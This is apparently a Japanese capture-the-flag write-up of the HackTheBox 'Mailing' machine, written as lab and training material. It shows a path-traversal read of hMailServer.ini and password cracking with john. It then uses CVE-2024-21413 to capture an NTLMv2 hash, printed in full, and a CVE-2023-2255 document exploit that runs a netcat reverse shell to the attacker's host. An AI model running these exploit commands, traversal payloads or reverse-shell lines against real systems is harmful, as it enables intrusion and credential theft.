概要
HackTheBox「Mailing」のWriteupです。
User Flag
ポートスキャンを実行します。
$ nmap -Pn -sV -T4 -A -sC -p- 10.10.11.14 -oN nmap_result
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: IMAP4 SORT QUOTA CHILDREN IDLE completed OK CAPABILITY ACL IMAP4rev1 NAMESPACE RIGHTS=texkA0001
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
993/tcp open ssl/imap hMailServer imapd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: IMAP4 SORT QUOTA CHILDREN IDLE completed OK CAPABILITY ACL IMAP4rev1 NAMESPACE RIGHTS=texkA0001
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
63701/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-08-29T06:06:44
|_ start_date: N/A
hMailServerでメールサービスや、IISでWebサービスが動作しています。
/etc/hostsにドメインを追記します。
10.10.11.14 mailing.htb
Webページが表示されました。
ページ下のDownload InstructionsボタンからPDFファイルをダウンロードできました。
?file=../download.phpのようなパスを指定するとdownload.phpファイルを読み込め、パストラバーサルの脆弱性があると分かりました。
任意のファイルを読み込めると分かったので、hMailServerの設定ファイルを読み込みます。
公式リファレンスや他のサイトからC:\Program Files (x86)\hMailServer\Bin\hMailServer.iniにhMailServerの設定ファイルがあると分かりました。
?file=../../Program%20Files%20(x86)/hMailServer\Bin\hMailServer.iniでiniファイルを読み込めました。
レスポンスの内容からAdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7を発見しました。
ハッシュ値を解析し、パスワードを得られました。
$ john admin_hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5
homenetworkingadministrator (?)
メールサービスに関連する2024の脆弱性を検索するとCVE-2024–21413がヒットしました。
この脆弱性を悪用することでNTLMv2ハッシュ値を得られるみたいです。
responderで待ち受けをします。
$ sudo responder -I tun0
攻撃には下記PoCを使用します。
--recipientに指定するメールアドレスはWebサイトからruy,maya,gregoryのどれかであると推測できます。
PoCを実行します。
$ python CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.96\test\meeting' --subject test
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / ah@primepage.de
✅ Email sent successfully.
responderの出力を確認すると、mayaアカウントのNTLMv2ハッシュ値を得られました。
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.14
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:e9feca9ce2bd5b2f:29248274D554A8C1E3549794DBA94258:010100000000000000CFCC8AED04DB017858AD3C5D75F5F70000000002000800410035004400430001001E00570049004E002D0033004F0049004200340039005400460046005A004E0004003400570049004E002D0033004F0049004200340039005400460046005A004E002E0041003500440043002E004C004F00430041004C000300140041003500440043002E004C004F00430041004C000500140041003500440043002E004C004F00430041004C000700080000CFCC8AED04DB0106000400020000000800300030000000000000000000000000200000E4BD69AB059FC3E6150EAD15C311404023803D330FFB076DB3CD6F79338E5D470A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00390036000000000000000000
ハッシュ値を解析するとパスワードを得られました。
$ john maya_hash --wordlist=/usr/share/wordlists/rockyou.txt
m4y4ngs4ri (maya)
evil-winrmでターゲットマシンにリモート接続します。
$ evil-winrm -u maya -p m4y4ngs4ri -i mailing.htb
*Evil-WinRM* PS C:\Users\maya\Documents>
mayaアカウントのシェルを取得できました。
user.txtファイルを検索します。
Get-ChildItem -Path C:\ -Recurse -Filter "user.txt" -ErrorAction SilentlyContinue
Directory: C:\Users\maya\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/12/2024 4:14 PM 34 user.txt
C:\Users\maya\Desktop\user.txtからユーザーフラグを入手できました。
*Evil-WinRM* PS C:\Users\maya\Documents> type C:\Users\maya\Desktop\user.txt
43743a337c17c773fe5c64357aea2d6d
Root Flag
インストールされているプログラムを確認するとLibreOfficeがあり、バージョンをは7.4.0.1でした。
dir "C:\Program Files"
d----- 3/4/2024 6:57 PM LibreOffice
type "C:\program files\libreoffice\program\version.ini"
MsiProductVersion=7.4.0.1
このバージョンの脆弱性を検索するとCVE-2023-2255がヒットしました。
攻撃には下記PoCを利用します。
脆弱性を悪用してNetcatでシェルを取得できるようにします。
PoCを実行し、アップロード用のodtファイルを作成します。
$ python CVE-2023-2255.py --cmd "cmd.exe /c C:\ProgramData\nc.exe -e cmd.exe 10.10.14.96 1234" --output exploit.odt
File exploit.odt has been created !
Netcatでリッスンします。
$ nc -lnvp 1234
listening on [any] 1234 ...
C:\ProgramDataにNetcatをアップロードします。
*Evil-WinRM* PS C:\Important Documents> cd C:\ProgramData
*Evil-WinRM* PS C:\ProgramData> upload /home/kali/Mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/nc.exe
Info: Uploading /home/kali/Mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/nc.exe to C:\ProgramData\nc.exe
Data: 79188 bytes of 79188 bytes copied
Info: Upload successful!
C:\Important Documentsに移動し、作成したodtファイルをアップロードします。
*Evil-WinRM* PS C:\ProgramData> cd "C:\Important Documents"
*Evil-WinRM* PS C:\Important Documents> upload /home/kali/Mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/exploit.odt
Info: Uploading /home/kali/Mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/exploit.odt to C:\Important Documents\exploit.odt
Data: 40732 bytes of 40732 bytes copied
Info: Upload successful!
Netcatを確認すると管理者権限を取得できました。
$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.96] from (UNKNOWN) [10.10.11.14] 53972
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\LibreOffice\program>whoami
whoami
mailing\localadmin
C:\Users\localadmin\Desktop\root.txtからルートフラグを入手できます。
C:\Program Files\LibreOffice\program>type C:\Users\localadmin\Desktop\root.txt
type C:\Users\localadmin\Desktop\root.txt
887b955163c3ee216553d9422b53b305